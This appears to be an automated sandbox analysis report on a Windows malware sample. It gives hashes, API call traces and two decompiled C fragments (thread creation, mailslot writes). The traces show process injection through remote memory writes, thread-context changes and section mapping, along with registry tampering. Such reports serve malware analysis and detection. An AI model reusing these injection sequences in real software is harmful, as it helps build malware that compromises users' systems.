  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 67591

General

Root Process Name:d3d8sext.exe
Process MD5:479B945127CC75C2A44ED1B13482FB07
Total matches:151
Initial Analysis Report:Open
Initial sample Analysis ID:67591
Initial sample SHA 256:CA5C9DCD28B358A05CF0F3CDA193EB48861E9B0A51E8656C23BE5CAEDF1D2012
Initial sample name:yyy.exe

Similar Executed Functions

Function 001CDA13, Relevance: 10.6, APIs: 7, Instructions: 111 Total matches: 36string
Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 01B33E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32E04, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 251 Total matches: 146registrystringmemory
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001D7CFA, Relevance: 13.6, APIs: 9, Instructions: 114 Total matches: 65memorystring
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B314CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 50136b8a9ad019f77738c7d2695a80d9cfa58a10d54e3dd229c6b48dc4baf302
  • Instruction ID: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
  • Opcode Fuzzy Hash: 2ED0A7C10F5D4412085E48CC143A5A300CAEC2171527BAE2F3439681A14B52311D0EC9
  • Instruction Fuzzy Hash: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 01B314D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,01B38000,?,?,01B3180F,00000000,?,01B37494), ref: 01B314FF
  • FindWindowA.USER32(01B38640,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31520
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
